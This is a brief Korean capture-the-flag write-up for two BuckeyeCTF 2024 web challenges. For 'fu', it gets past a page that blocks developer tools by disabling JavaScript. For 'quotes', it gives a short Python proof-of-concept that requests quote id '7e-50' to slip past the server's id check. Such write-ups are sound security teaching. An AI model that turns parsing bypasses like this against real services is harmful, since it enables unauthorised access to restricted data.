들어가며
BuckeyeCTF 2024의 write-up이다.
Web
1. fu
description : "There is just news. There is no good or bad. Except for the news that you can sign up for classes today at fu.challs.pwnoh.io and become the dragon warrior for a few dollars a month, that is GREAT news!" - Master Oogway
제공하는 파일은 없다. 문제에 들어가면 해당 사이트가 나오는데 아무것도 할 수 없고, 개발자 도구 또한 열 수 없는 상태이다.
자바스크립트로 개발자 도구를 열 수 없게 만들어 놓은 것 같아, 자바스크립트를 Disable 했다.
https://chromewebstore.google.com/detail/web-developer-tool-for-ch/ghenifimhcdihapkceohjpgiabidpgji
해당 확장 프로그램을 통해 자바스크립트를 Disable하여 flag를 획득할 수 있는 문제였다.
2. quotes
description :
해당 문제의 설명이다.
import requests
import base64
url = "https://quotes.challs.pwnoh.io/"
s = requests.Session()
r = s.get(url + '/register')
r = s.get(url + '/quote', params={'id': "7e-50"})
print(r.json()['quote'])최종 poc 코드이다.
ref :
1. https://github.com/x03ee/BuckeyeCTF-2024/tree/main/web/fu
2. https://github.com/negasora/Some-CTF-Solutions/blob/master/buckeye-2024/web/quotes/solve.py
3. https://gist.github.com/ky28059/b5f47ad77ea136d07cfaf15980fedf4c
4. https://github.com/negasora/Some-CTF-Solutions/blob/master/buckeye-2024/web/quotes/solve.py
5. https://www.thesecuritywind.com/post/buckeyectf-2024-quotes-web
